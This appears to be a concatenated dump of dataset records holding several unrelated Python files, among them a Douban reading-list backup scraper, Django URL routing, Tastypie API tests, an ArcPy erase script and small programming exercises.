","repo_name":"leochien1110/iceboat_project","sub_path":"windmodel.py","file_name":"windmodel.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41565559104","text":"import LT16_module1\r\n\r\nfrom LT16_module1 import employee as ep, technical_employee as tep\r\n\r\n\r\nemp=ep(first_name='Smruti',last_name='Ranjan',month_pay=50000)\r\n\r\nemp.email()\r\nprint(emp.emailid)\r\n\r\n\r\ntech_emp=tep('Vijay','Sharma',50000,\"python\")\r\ntech_emp.email()\r\nprint(tech_emp.emailid)\r\n","repo_name":"DeepHobbying/BasicsofPython","sub_path":"LT16_module2.py","file_name":"LT16_module2.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40639163368","text":"import json\nfrom dataclasses import dataclass\nfrom dataclasses_jsonschema import JsonSchemaMixin\nfrom pprint import pprint\n\nBOOTSTRAP_SERVERS = ''\nEVENTS_TO_PRODUCE = 10\n\nwith open('wikiLangs.json', 'r', encoding=\"utf8\") as f:\n    language_codes = json.load(f)\n\nfrom urllib.parse import urlparse, parse_qs\n\n\nTOPIC_URLs = {'recentchange': \"https://stream.wikimedia.org/v2/stream/mediawiki.recentchange\",\n              'revision' : \"https://stream.wikimedia.org/v2/stream/mediawiki.page-create\"}\n\n\n
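WindModel above frames its state as `b'E'` plus the base64 of a float32 array; the decode side is not in the record, so this round-trip sketch of how a receiver might unpack the message is an assumption:

```python
import base64
from numpy import array, float32, frombuffer

vvar = array((5.0, 1.0), dtype=float32)
message = 'E'.encode('ascii') + base64.b64encode(vvar)  # as WindModel builds it

# Hypothetical receiver: split off the tag, then rebuild the float32 vector.
tag, payload = message[:1], message[1:]
decoded = frombuffer(base64.b64decode(payload), dtype=float32)

assert tag == b'E' and (decoded == vvar).all()
print(decoded)  # [5. 1.]
```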
# JsonSchemaMixin supplies the json_schema() classmethod used in __main__\n@dataclass\nclass WikiEvent(JsonSchemaMixin):\n    # Url: str\n    PageTitle: str\n    IsBot: bool\n    UserName: str\n    Date: str\n    # Timestamp: int\n    Lang: str = \"English\"\n    # Comment: str = \"\"\n    Type: str = \"\"\n    IsRevert: bool = False\n    RevertDetails: str = \"\"\n\n    def __init__(self, eventId, event, topic_url):\n        url = event['meta']['uri']\n        if topic_url == TOPIC_URLs['recentchange']:\n            self.Type = event['type']\n            # self.Url = url\n            self.PageTitle = event['title']\n            self.IsBot = event['bot']\n            self.UserName = event['user']\n            # self.Comment = event.get('comment', \"\")\n            # self.Timestamp = eventId[0]['timestamp']\n            self.Date = event['meta']['dt']\n            self.Lang = next((language_codes[code] for code in language_codes if code in urlparse(url).netloc), self.Lang)\n\n        elif topic_url == TOPIC_URLs['revision']:\n            # self.Url = url\n            self.PageTitle = event['page_title']\n            self.IsBot = event['performer']['user_is_bot']\n            self.UserName = event['performer']['user_text']\n            self.IsRevert = event.get('rev_is_revert', False)\n            self.RevertDetails = event.get('rev_revert_details', \"\")\n            # self.Comment = event.get('comment', \"\")\n            # self.Timestamp = eventId[0]['timestamp']\n            self.Date = event['meta']['dt']\n            self.Lang = next((language_codes[code] for code in language_codes if code in urlparse(url).netloc), self.Lang)\n\n    def toJSON(self):\n        return json.dumps(self.__dict__, sort_keys=True, indent=4).encode('utf-8')\n    \n\nif __name__ == \"__main__\":\n    pprint(WikiEvent.json_schema())\n\n\n\n\n\n\n","repo_name":"LahavPadan/WikiMedia-Events-KafkaStreams-App","sub_path":"wikipedia-statistics/src/main/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5571772012","text":"linha = input().split()\nterm1 = linha[0]\nterm2 = linha[1]\n\nwhile not(term1 == '0' and term2 == '0'):\n    t1 = int(term1)\n    t2 = int(term2)\n    charsT1 = []\n    charsT2 = []\n    tamT1 = len(term1)\n    tamT2 = len(term2)\n    somador = 0\n    if tamT1 > tamT2:\n        qtdZeros = tamT1-tamT2\n        cont = 0\n        while cont < qtdZeros:\n            charsT2.append('0')\n            cont += 1\n    if tamT1 < tamT2:\n        qtdZeros = tamT2-tamT1\n        cont = 0\n        while cont < qtdZeros:\n            charsT1.append('0')\n            cont += 1\n    #print(tamT1,tamT2)\n    for c in term1:\n        charsT1.append(c)\n    for c in term2:\n        charsT2.append(c)\n    anterior = 0\n    #print('len(charsT1)',len(charsT1))\n    for index in range(len(charsT1)-1,-1,-1):\n        #print('index',index)\n        #print(charsT1[index], charsT2[index])\n        #print('anterior',anterior)\n        if len(str(anterior)) > 1:\n            anterior = anterior[0]  # keep only the leading carry digit of the previous sum\n            #print('anterior[0]',anterior[0])\n            soma = int(charsT1[index])+int(charsT2[index])+int(anterior[0])\n        else:\n            soma = int(charsT1[index])+int(charsT2[index])\n        #print('soma',soma)\n        if soma >= 10:\n            anterior = str(soma)\n            somador += 1\n            #print('flag')\n        else:\n            anterior = str(soma)\n    #print(len(charsT1),len(charsT2))\n    #print(charsT1,charsT2)\n    if somador == 0:\n        print('No carry operation.')\n    if somador == 1:\n        print('1 carry operation.')\n    if somador > 1:\n        print(str(somador)+' carry operations.')\n    linha = input().split()\n    term1 = linha[0]\n    term2 = linha[1]\n","repo_name":"Nyon0k/TEP","sub_path":"Lista4/c10035.py","file_name":"c10035.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13545760528","text":"import difflib\nimport re\nfrom typing import Any\n\nfrom schema_salad.utils import json_dumps\n\n\nclass 
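The c10035 record above counts carry operations by padding digit lists and threading the previous sum through a string; the same count in a compact form (the function name is invented):

```python
def count_carries(a: int, b: int) -> int:
    """Number of carry operations when adding a and b digit by digit."""
    carries, carry = 0, 0
    while a or b:
        carry = 1 if (a % 10 + b % 10 + carry) >= 10 else 0
        carries += carry
        a //= 10
        b //= 10
    return carries

assert count_carries(123, 456) == 0
assert count_carries(555, 555) == 3
assert count_carries(123, 594) == 1
print(count_carries(999, 1))  # 3
```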
JsonDiffMatcher:\n \"\"\"Raise AssertionError with a readable JSON diff when not __eq__().\n\n Used with assert_called_with() so it's possible for a human to see\n the differences between expected and actual call arguments that\n include non-trivial data structures.\n \"\"\"\n\n def __init__(self, expected: Any):\n self.expected = expected\n\n def __eq__(self, actual: Any) -> bool:\n expected_json = json_dumps(self.expected, sort_keys=True, indent=2)\n actual_json = json_dumps(actual, sort_keys=True, indent=2)\n if expected_json != actual_json:\n raise AssertionError(\n \"\".join(\n difflib.context_diff(\n expected_json.splitlines(True),\n actual_json.splitlines(True),\n fromfile=\"Expected\",\n tofile=\"Actual\",\n )\n )\n )\n return True\n\n\ndef StripYAMLComments(yml: str) -> Any:\n return re.sub(r\"(?ms)^(#.*?\\n)*\\n*\", \"\", yml)\n","repo_name":"common-workflow-language/schema_salad","sub_path":"schema_salad/tests/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"72"} +{"seq_id":"26050873725","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@File : douban.py\r\n@Time : 2021/02/18\r\n@Author : HDUZN\r\n@Version : 2.0\r\n@Contact : hduzn@vip.qq.com\r\n@License : (C)Copyright 2021-2022\r\n@Desc : 将Douban 读过的书的记录保存到douban.xlsx 文件和数据库中\r\n (注:豆瓣标记后,没写标签、没评分/星 会报错,没写评论没关系。)\r\n 更新于2022/05/12,采用selenium4版本,跳过selenium的webdriver检测\r\n'''\r\n\r\n# here put the import lib\r\nimport douban_config, z_db\r\nimport time, os, re\r\nimport selenium\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nimport openpyxl\r\n\r\n# 获取最大页数和每一页的模板链接\r\ndef get_max_page_num(wd):\r\n num_element = wd.find_element(By.XPATH, '//div[@class=\"paginator\"]/a[last()]')\r\n max_page_num = int(num_element.text) # 21\r\n site = num_element.get_attribute('href')\r\n # num_site_list = [max_page_num, site]\r\n return [max_page_num, site]\r\n\r\n# 获取所有页数的链接List\r\ndef get_page_site_list(max_page_num, model_site):\r\n # model_site: https://book.douban.com/people/[id]/collect?start=300&sort=time&rating=all&filter=all&mode=grid\r\n cop = '[0-9]'\r\n site_part2 = ''.join(re.findall(cop, model_site)) # '300'\r\n site_part1 = model_site.split(site_part2)[0] # https://book.douban.com/people/[id]/collect?start=\r\n site_part3 = model_site.split(site_part2)[1] # &sort=time&rating=all&filter=all&mode=grid\r\n\r\n site_list = []\r\n for i in range(max_page_num):\r\n site_part2_num = str(i * 15)\r\n page_site = site_part1 + site_part2_num + site_part3\r\n site_list.append(page_site)\r\n return site_list\r\n\r\n# 获取读过的书的页面 wd\r\ndef get_readed_wd(site):\r\n option = webdriver.ChromeOptions()\r\n # option.add_experimental_option('detach', True) # 不自动关闭浏览器\r\n # option.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n # option.add_experimental_option('useAutomationExtension', False)\r\n \r\n # 使用本地debugger模式,可以提前登录\r\n option.add_experimental_option('debuggerAddress','127.0.0.1:9222')\r\n wd = webdriver.Chrome(options=option)\r\n wd.implicitly_wait(10)\r\n wd.maximize_window()\r\n\r\n # print(wd.execute_script(\"return window.navigator.userAgent\"))\r\n # wd.execute_cdp_cmd('Network.setUserAgentOverride', {\"userAgent\": user_agent})\r\n\r\n # # 默认window.navigator.webdriver=true\r\n # script = '''\r\n # Object.defineProperty(navigator, 'webdriver', {\r\n # get: () => false\r\n # 
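`JsonDiffMatcher` above hooks into mock assertions through `__eq__`; a minimal usage sketch with `unittest.mock`, assuming the class is importable from the record's module path (the `upload` call is hypothetical):

```python
from unittest.mock import Mock

from schema_salad.tests.matcher import JsonDiffMatcher

upload = Mock()
upload({"name": "example", "size": 42})

# Matching arguments: the comparison returns True and the assertion passes.
upload.assert_called_with(JsonDiffMatcher({"name": "example", "size": 42}))

# Mismatched arguments: __eq__ raises AssertionError carrying a context diff.
try:
    upload.assert_called_with(JsonDiffMatcher({"name": "example", "size": 41}))
except AssertionError as err:
    print(err)
```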
})\r\n # '''\r\n # wd.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\"source\": script})\r\n\r\n wd.get(site)\r\n time.sleep(3)\r\n\r\n # 登录\r\n try:\r\n wd.find_element(By.CLASS_NAME, 'top-nav-info').click()\r\n time.sleep(1)\r\n wd.find_element(By.CLASS_NAME, 'account-tab-account').click()\r\n time.sleep(2)\r\n\r\n account = wd.find_element(By.ID, 'username')\r\n pwd = wd.find_element(By.ID, 'password')\r\n account.clear()\r\n pwd.clear()\r\n account.send_keys(douban_config.douban_id)\r\n pwd.send_keys(douban_config.douban_pwd)\r\n\r\n login = wd.find_element(By.XPATH, '//div[@class=\"account-form-field-submit \"]//a[@class=\"btn btn-account btn-active\"]')\r\n login.click() # 这里需要自己点一下验证码图片\r\n time.sleep(10)\r\n except NoSuchElementException:\r\n # 找不到该元素表示已登录\r\n print('已登录')\r\n time.sleep(1)\r\n wd.find_element(By.XPATH, '//a[@class=\"bn-more\"]').click()\r\n\r\n # 打开个人主页\r\n wd.find_element(By.XPATH, '//a[@class=\"bn-more\"]').click()\r\n wd.find_element(By.XPATH, '//div[@class=\"more-items\"]//a').click()\r\n time.sleep(2)\r\n\r\n # 读过(我这里只有想读、读过的记录,没有在读)读过是第2项\r\n readed = wd.find_element(By.XPATH, '//div[@id=\"book\"]//h2//a[@target=\"_blank\"][2]')\r\n readed_site = readed.get_attribute('href')\r\n # print(readed_site)\r\n readed.click()\r\n\r\n # switch to new window 切换到新的窗口\r\n for handle in wd.window_handles:\r\n wd.switch_to.window(handle)\r\n if(wd.current_url == readed_site):\r\n break\r\n\r\n time.sleep(2)\r\n return wd\r\n\r\n# 获取一页的数据内容\r\ndef get_one_page(wd, page_site):\r\n try:\r\n wd.get(page_site)\r\n time.sleep(2)\r\n except selenium.common.exceptions.TimeoutException:\r\n time.sleep(5)\r\n wd.get(page_site)\r\n\r\n pic_list = [] # 图书图片List\r\n pic_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//img') # 图书图片\r\n for value in pic_values:\r\n pic_site = value.get_attribute('src')\r\n pic_list.append(pic_site)\r\n # print(pic_list)\r\n\r\n book_site_list = [] # 图片链接List\r\n book_name_list = [] # 图书名称List\r\n book_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//h2//a')\r\n for value in book_values:\r\n book_site = value.get_attribute('href')\r\n book_site_list.append(book_site)\r\n book_name = value.text\r\n book_name_list.append(book_name)\r\n # print(book_site_list)\r\n # print(book_name_list)\r\n\r\n author_list = [] # 作者信息List\r\n author_info = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"pub\"]')\r\n for value in author_info:\r\n author_list.append(value.text)\r\n # print(author_list)\r\n\r\n tags_list = [] # 标签List\r\n tag_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//span[@class=\"tags\"]')\r\n for value in tag_values:\r\n tags_list.append(value.text.split(':')[1].strip())\r\n # print(tags_list)\r\n\r\n date_list = [] # 读过日期List\r\n date_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//span[@class=\"date\"]')\r\n for value in date_values:\r\n date_list.append(value.text.split()[0])\r\n # print(date_list)\r\n\r\n rating_list = [] # 评分List(星星)\r\n rating_num_list = [] # 评分List(数字)\r\n rating_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//span[1]')\r\n for value in rating_values:\r\n rate = value.get_attribute('class')[6] # str 5/4/3/2/1\r\n rating_num_list.append(int(rate))\r\n 
rating_list.append(douban_config.rating_dict[rate])\r\n # print(rating_list)\r\n # print(rating_num_list)\r\n\r\n comment_list = [] # 短评List\r\n comment_values = wd.find_elements(By.XPATH, '//li[@class=\"subject-item\"]//div[@class=\"info\"]//div[@class=\"short-note\"]//p[@class=\"comment\"]')\r\n for value in comment_values:\r\n comment_list.append(value.text)\r\n # print(comment_list)\r\n\r\n num = len(book_name_list)\r\n data_list = []\r\n for i in range(num):\r\n data_list.append([book_name_list[i], book_site_list[i], author_list[i], tags_list[i], date_list[i], comment_list[i], rating_num_list[i], rating_list[i], pic_list[i]])\r\n return data_list\r\n\r\n# 把记录数据List 全部存入数据库\r\ndef insert_into_db(db_file, table_name, data_list):\r\n columns = ['name', 'site', 'author', 'tags', 'date', 'comments', 'rating_num', 'rating', 'pic']\r\n\r\n sql = z_db.get_insert_sql_by_colum_names(table_name, columns)\r\n # print(sql) # insert into books (name, site, author, tags, date, comments, rating, pic) values (?, ?, ?, ?, ?, ?, ?, ?)\r\n z_db.insert_into_db(db_file, table_name, sql, data_list)\r\n\r\n# 把记录数据List 全部存入Excel表\r\ndef write_to_excel(ex_file, sheet_name, data_list):\r\n if(os.path.exists(ex_file)):\r\n book = openpyxl.load_workbook(ex_file)\r\n if(sheet_name in book.sheetnames):\r\n sheet = book[sheet_name]\r\n else:\r\n sheet = book.create_sheet(sheet_name)\r\n else:\r\n book = openpyxl.Workbook()\r\n sheet = book.active\r\n sheet.title = sheet_name\r\n\r\n for data_line in data_list:\r\n sheet.append(data_line)\r\n book.save(ex_file)\r\n\r\n# main\r\ndef main():\r\n site = douban_config.books_site\r\n wd = get_readed_wd(site)\r\n\r\n num_site_list = get_max_page_num(wd) # [最大页数, 模板url]\r\n\r\n max_page_num = num_site_list[0] # 最大页数\r\n # print(max_page_num) # 21\r\n model_site = num_site_list[1] # 模板url\r\n # print(model_site) # https://book.douban.com/people/[id]/collect?start=300&sort=time&rating=all&filter=all&mode=grid\r\n \r\n page_site_list = get_page_site_list(max_page_num, model_site) # 获取所有页数的链接List\r\n\r\n all_page_data_list = [] # 所有页面的数据信息\r\n for page_site in page_site_list:\r\n # print(page_site)\r\n print('------------第', page_site_list.index(page_site)+1, '页')\r\n one_page_data_list = get_one_page(wd, page_site)\r\n time.sleep(2)\r\n all_page_data_list = all_page_data_list + one_page_data_list\r\n # print(all_page_data_list)\r\n wd.quit()\r\n\r\n all_page_data_list.reverse() # 倒序\r\n\r\n # 读过的书籍数据信息写入数据库\r\n db_file = douban_config.db_file\r\n table_name = douban_config.books_table_name\r\n insert_into_db(db_file, table_name, all_page_data_list)\r\n time.sleep(3)\r\n\r\n # 读过的书籍数据信息写入Excel表格\r\n ex_file = douban_config.ex_file\r\n sheet_name = douban_config.book_sheet_name\r\n write_to_excel(ex_file, sheet_name, all_page_data_list)\r\n\r\n print('--------------------- Douban 已读书目 记录保存成功!')\r\n\r\n# 清空数据库表数据\r\n# z_db.delete_table(douban_config.db_file, douban_config.books_table_name)\r\n\r\n# main()","repo_name":"hduzn/own_douban_backup","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1329319116","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Source: https://pro.arcgis.com/es/pro-app/tool-reference/analysis/erase.htm\n# Nos permitira eliminar informacion que se intersecta.\n\n# Autor \t: Ing. 
Daniel Ramos Mendoza\n# Web\t\t: HDRamosMendoza.github.io/Perfil-Profesional\n# Email\t\t: heber.daniel.ramos.mendoza@gmail.com\n# Móvil\t\t: 051 999130638\n# Originario: Perú - Lima\n# NOTA: No es el mejor código que eh realizado. Es una simple demo de mis inicios de un par de años atras.\nimport arcpy\nimport os\n\narcpy.env.overwriteOutput = True\narcpy.env.workspace = \"D:/RepositorioGitHub/ArcPy-GIS/Mixed/Tema_02/Capas\"\npathUrl_Result = \"D:/RepositorioGitHub/ArcPy-GIS/Project/Seccion-2/Result\"\n\nlistValues = {}\nlistValues['erase'] = []\n\n# Vamos a determinar los rios que se encuentran totalmente \n# contenidos dentro el limite del departamento. Haremos uso de analisis anterior (Rios_Cruce_Departamento)\nlistValues['erase'].append({\n\t\t'inFeatures' \t: \"Rios_Quebradas.shp\",\n\t\t'eraseFeatures'\t: os.path.join(pathUrl_Result, \"SpatialJoin/Rios_Cruce_Departamento.shp\"),\n\t\t'outFeatures' \t: os.path.join(pathUrl_Result, \"Erase/Rios_Completo.shp\")\n\t})\n\n# Se realizara un inventario forestal.\nlistValues['erase'].append({\n\t\t'inFeatures' \t: \"Forestal.shp\",\n\t\t'eraseFeatures'\t: \"Departamnentos_No.shp\",\n\t\t'outFeatures' \t: os.path.join(pathUrl_Result, \"Erase/Forestal_Proyecto.shp\")\n\t})\n\n# Se necesita los restos arqueologicos que no se \n# encuentren cerca a un rio en un radio de 100 metros.\nlistValues['erase'].append({\n\t\t'inFeatures' \t: \"Restos_Arqueologicos.shp\",\n\t\t'eraseFeatures'\t: os.path.join(pathUrl_Result, \"SpatialJoin/Arqueologia_100m.shp\"),\n\t\t'outFeatures' \t: os.path.join(pathUrl_Result, \"Erase/Restos_Mayores_100.shp\")\n\t})\n\nfor item in listValues['erase']:\n\tarcpy.Erase_analysis(\n\t\tin_features \t\t= item['inFeatures'],\n\t\terase_features \t\t= item['eraseFeatures'],\n\t\tout_feature_class \t= item['outFeatures']\n\t)","repo_name":"HDRamosMendoza/Python-GIS","sub_path":"ExampleAnalysis/Project/Seccion-2/2c-Erase.py","file_name":"2c-Erase.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3473200785","text":"#!/usr/bin/python3\n\n# e27blank.py by Matej Kogovsek, matej@hamradio.si, 3.feb.2016\n# requires pySerial, http://pyserial.sourceforge.net\n\nimport sys,serial\n\ndef atcmd(cmnd, resp, to = 0.2):\n if ser.timeout != to:\n ser.timeout = to\n if len(cmnd) > 0:\n ser.flushInput()\n ser.write((cmnd + '\\n').encode('ascii'))\n r = ser.readline().decode('ascii').rstrip()\n if len(resp) > 0 and r.find(resp) == -1:\n if r == '': r = '(none)'\n raise Exception('Error! 
expected ' + resp + '\\ncmnd was: ' + cmnd + '\\nresp was: ' + r + '\\n')\n return r\n\nif len(sys.argv) < 3:\n print('usage: e27blank.py serial_if size')\n sys.exit(1)\n\nfs = int(sys.argv[2])\n\nser = serial.Serial(sys.argv[1], 115200)\ntry:\n for i in range(5):\n try:\n atcmd('AT+BUFRDDISP=0', 'OK')\n break\n except:\n pass\n if i == 4:\n print('programmer not responding')\n sys.exit(1)\n\n try:\n atcmd('AT+E27BLANK='+hex(fs)[2:].zfill(4), 'OK')\n except:\n print('Device NOT blank.')\n sys.exit(1)\n\nfinally:\n ser.close()\n\nprint('Device is blank.')\n","repo_name":"matejx/e27prog","sub_path":"py/e27blank.py","file_name":"e27blank.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35950899740","text":"import typing\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import URLPattern, URLResolver, include, path, re_path\nfrom django.views import defaults as default_views\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\nfrom wagtail import urls as wagtail_urls\nfrom wagtail.admin import urls as wagtailadmin_urls\nfrom wagtail.contrib.sitemaps.views import sitemap\nfrom wagtail.documents import urls as wagtaildocs_urls\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularSwaggerView,\n)\n\nfrom holon.urls import urlpatterns as holon_urls\nfrom holon.urls import urlpatterns_v2 as holon_urls_v2\nfrom holon.views import HolonCMSLogic, holonCMSLogicFormatter\nfrom main.views.csfr import get_csrf\nfrom main.views.error_500 import error_500_view\nfrom main.views.page_not_found import PageNotFoundView\nfrom nextjs.api import api_router\n\nhandler404 = PageNotFoundView.as_view()\nhandler500 = error_500_view\ncsrf = get_csrf\n\nURL = typing.Union[URLPattern, URLResolver]\nURLList = typing.List[URL]\n\nurlpatterns: URLList = []\n\nif settings.DEBUG:\n urlpatterns += [\n path(\n \"wt/400/\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ), # NOQA\n path(\n \"wt/403/\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ), # NOQA\n path(\"wt/404/\", handler404, kwargs={\"exception\": Exception(\"Page not Found\")}), # NOQA\n path(\"wt/500/\", handler500, kwargs={\"exception\": Exception(\"Internal error\")}), # NOQA\n path(\"wt/csrf/\", csrf), # NOQA\n ]\n\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns += [path(\"wt/__debug__/\", include(debug_toolbar.urls))]\n\nurlpatterns += [\n path(settings.ADMIN_URL, admin.site.urls),\n path(\"wt/api/nextjs/v1/\", api_router.urls),\n path(\"wt/api/nextjs/v1/\", include(holon_urls)),\n path(\"wt/api/nextjs/v2/\", include(holon_urls_v2)),\n path(\"wt/api/schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\n \"wt/api/schema/swagger\",\n SpectacularSwaggerView.as_view(url_name=\"schema\"),\n name=\"swagger-ui\",\n ),\n path(\"wt/cms/\", include(wagtailadmin_urls)),\n path(\"wt/cms/modelconfig\", HolonCMSLogic.as_view()),\n path(\"wt/cms/modelconfig/schema\", holonCMSLogicFormatter),\n path(\"wt/documents/\", include(wagtaildocs_urls)),\n path(\"wt/sitemap.xml\", sitemap, name=\"sitemap\"),\n path(\"wt/dj-rest-auth/\", include(\"dj_rest_auth.urls\")),\n path(\"wt/dj-rest-auth/registration/\", include(\"dj_rest_auth.registration.urls\")),\n path(\"wt/api/token/\", 
TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"wt/api/token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n]\n\nurlpatterns += [re_path(r\"\", include(wagtail_urls))]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"ZEnMo/Holon-webapp","sub_path":"src/pipit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"7874070285","text":"# CourseResource\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom tastypie.test import ResourceTestCaseMixin\n\nfrom oppia.tests.utils import get_api_key, get_api_url\n\n\nclass CourseResourceTest(ResourceTestCaseMixin, TestCase):\n fixtures = ['user.json', 'oppia.json', 'permissions.json']\n\n def setUp(self):\n super(CourseResourceTest, self).setUp()\n user = User.objects.get(username='demo')\n admin = User.objects.get(username='admin')\n self.auth_data = {\n 'username': 'demo',\n 'api_key': get_api_key(user=user).key,\n }\n self.admin_auth = {\n 'username': 'admin',\n 'api_key': get_api_key(user=admin).key\n }\n self.url = get_api_url('course')\n\n # Post invalid\n def test_post_invalid(self):\n self.assertHttpMethodNotAllowed(self.api_client.post(self.url, format='json', data={}))\n\n # test unauthorized\n def test_unauthorized(self):\n data = {\n 'username': 'demo',\n 'api_key': '1234',\n }\n self.assertHttpUnauthorized(self.api_client.get(self.url, format='json', data=data))\n\n # test authorized\n def test_authorized(self):\n resp = self.api_client.get(self.url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n\n # test contains courses (and right no of courses)\n def test_has_courses(self):\n resp = self.api_client.get(self.url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n self.assertValidJSON(resp.content)\n response_data = self.deserialize(resp)\n self.assertTrue('courses' in response_data)\n # should have 2 courses with the test data set\n self.assertEquals(len(response_data['courses']), 2)\n # check each course had a download url\n for course in response_data['courses']:\n self.assertTrue('url' in course)\n self.assertTrue('shortname' in course)\n self.assertTrue('title' in course)\n self.assertTrue('version' in course)\n\n def test_course_get_single(self):\n resource_url = get_api_url('course', 1)\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n self.assertValidJSON(resp.content)\n # check course format\n course = self.deserialize(resp)\n self.assertTrue('shortname' in course)\n self.assertTrue('title' in course)\n self.assertTrue('description' in course)\n self.assertTrue('version' in course)\n\n def test_course_get_single_not_found(self):\n resource_url = get_api_url('course', 999)\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_single_draft_nonvisible(self):\n resource_url = get_api_url('course', 3)\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_single_draft_admin_visible(self):\n resource_url = get_api_url('course', 3)\n resp = self.api_client.get(resource_url, format='json', data=self.admin_auth)\n self.assertHttpOK(resp)\n self.assertValidJSON(resp.content)\n\n def test_course_download_file_zip_not_found(self):\n resource_url = 
get_api_url('course', 2) + 'download/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_download_file_course_not_found(self):\n resource_url = get_api_url('course', 999) + 'download/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_download_draft_nonvisible(self):\n resource_url = get_api_url('course', 3) + 'download/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_activity(self):\n resource_url = get_api_url('course', 1) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpOK(resp)\n\n def test_course_get_activity_notfound(self):\n resource_url = get_api_url('course', 999) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_activity_draft_nonvisible(self):\n resource_url = get_api_url('course', 3) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.auth_data)\n self.assertHttpNotFound(resp)\n\n def test_course_get_acitivity_draft_admin_visible(self):\n resource_url = get_api_url('course', 3) + 'activity/'\n resp = self.api_client.get(resource_url, format='json', data=self.admin_auth)\n self.assertHttpOK(resp)\n","repo_name":"DigitalCampus/django-nurhi-oppia","sub_path":"oppia/tests/api/test_course.py","file_name":"test_course.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71332573993","text":"import glob\nimport os\nimport torchaudio\nimport hydra\nimport numpy as np\n\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\n\n@hydra.main(config_path=\"configs\", config_name=\"profiler\")\ndef main(cfg):\n all_wav_paths = glob.glob(f\"{cfg.wavs_directory_path}/*.wav\")\n emotion_dict = dict(zip(cfg.emotion_ids, cfg.emotions))\n cfg_profiler_emotion_dict = defaultdict(lambda: 0)\n for wav_path in tqdm(all_wav_paths):\n _, wav_filename = os.path.split(wav_path)\n wav, sr = torchaudio.load(wav_path)\n seconds_len = len(wav.squeeze()) // sr\n emotion = emotion_dict[int(wav_filename[-5])]\n cfg_profiler_emotion_dict[emotion] += seconds_len\n total_dataset_len = 0\n for emotion, sec_len in zip(list(cfg_profiler_emotion_dict.keys()), list(cfg_profiler_emotion_dict.values())):\n hours = np.round(sec_len / 60 / 60, 3)\n print(f\"Emotion '{emotion}': {hours} hours.\")\n total_dataset_len += hours\n print(f\"Total dataset size: {total_dataset_len} hours.\")\n\n\nif __name__ == \"__main__\":\n 